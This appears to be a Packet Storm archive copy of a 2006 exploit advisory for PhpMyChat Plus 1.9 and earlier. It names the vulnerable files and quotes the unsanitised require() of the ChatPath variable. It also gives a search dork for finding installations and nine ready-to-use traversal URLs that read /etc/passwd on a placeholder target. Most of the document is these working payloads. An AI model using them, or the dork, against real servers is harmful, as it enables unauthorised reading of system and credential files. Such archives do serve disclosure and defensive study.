phpmychatPlus19.txt

2006-11-09T00:00:00
ID PACKETSTORM:51799
Type packetstorm
Reporter ajann
Modified 2006-11-09T00:00:00

Description

                                        
                                            `a*******************************************************************************  
# Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities  
  
# Author : ajann  
  
# Dork : phpMyChat plus  
  
# Vuln;  
  
*******************************************************************************  
[Files]  
avatar.php  
colorhelp_popup.php  
color_popup.php  
index.php  
index1.php  
/lib/connected_users.lib.php  
/lib/index.lib.php  
logs.php  
phpMyChat.php3  
[/Files]  
  
[Code,1]  
connected_users.lib.php Error:  
  
..  
....  
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");  
require("./${ChatPath}/lib/clean.lib.php");  
....  
..  
  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] ChatPath=[file]  
Key [:] L=[file]  
Key [:] ChatPath=[file]  
  
  
\Example:  
  
http://target.com/path/avatar.php?ChatPath=../../etc/passwd  
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd  
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd  
http://target.com/path/index.php?ChatPath=../../etc/passwd  
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd  
http://target.com/path/avatar.php?ChatPath=../../etc/passwd  
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd  
http://target.com/path/logs.php?L=../../etc/passwd  
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd  
  
  
  
# ajann,Turkey  
# ...  
# Im not Hacker!  
`